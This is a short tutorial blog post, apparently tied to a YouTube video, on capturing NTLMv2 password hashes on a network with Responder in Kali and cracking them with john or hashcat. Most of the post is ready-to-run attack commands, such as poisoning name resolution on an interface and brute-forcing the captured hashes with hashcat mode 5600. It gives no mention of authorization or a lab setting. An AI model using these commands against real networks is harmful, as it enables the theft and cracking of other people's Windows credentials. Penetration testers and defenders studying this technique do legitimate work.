top of page
Search
  • Writer's pictureHox Framework

Capturing and cracking NTLMv2 Hashes in Kali | QuickTutorials | HOXFRAMEWORK

Capturing and cracking NTLMv2 Hashes in Kali | QuickTutorials | HOXFRAMEWORK


https://www.youtube.com/watch?v=UFK1ZmdypRg

Hello and welcome,


In this tutorial you will simply turn on responder on kali using :

responder -I wlan0

or

responder -I wlan0 -w -r -P

if you are using eth0 use that instead.

Then once you captured the hash you want to crack, isolate it into a text file.

After that all you have to do is use john or hydra to crack the password. Make sure you start the session

every time so you dont lose the progress.

examples

>john --format=netntlmv2 hash.txt

>hashcat -m 5600 -a 3 hash.txt

-here we are specifying netntlmv2(5600) and attack mode 3 (-a 3)


Thank you so much for visiting, have a nice day :)


13 views0 comments

Recent Posts

See All
bottom of page